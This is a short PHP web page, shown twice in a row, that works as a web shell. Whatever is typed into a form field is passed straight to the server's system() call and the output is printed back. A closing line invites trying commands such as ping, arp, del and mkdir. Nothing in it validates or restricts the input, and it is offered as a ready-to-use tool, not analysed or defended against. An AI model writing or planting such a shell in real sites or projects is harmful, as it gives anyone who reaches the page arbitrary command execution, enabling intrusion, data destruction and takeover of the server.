CODE
<html>
<head>
<title>Command</title>
<style type="text/css">
.area {
width:100%;
height:90%;
}
</style>
</head>
<body>
<textarea class="area" readonly="readonly">
<?php
if($sys == NULL){} else {
$cmd = system($sys);
echo $cmd;
}
?>
</textarea>
<form method="post">
<input type="text" name="sys" />
<input type="submit" value="Command" />
</form>
</body>
</html>
<head>
<title>Command</title>
<style type="text/css">
.area {
width:100%;
height:90%;
}
</style>
</head>
<body>
<textarea class="area" readonly="readonly">
<?php
if($sys == NULL){} else {
$cmd = system($sys);
echo $cmd;
}
?>
</textarea>
<form method="post">
<input type="text" name="sys" />
<input type="submit" value="Command" />
</form>
</body>
</html>
you can try commands like ping, arp, del, mkdir, ....etc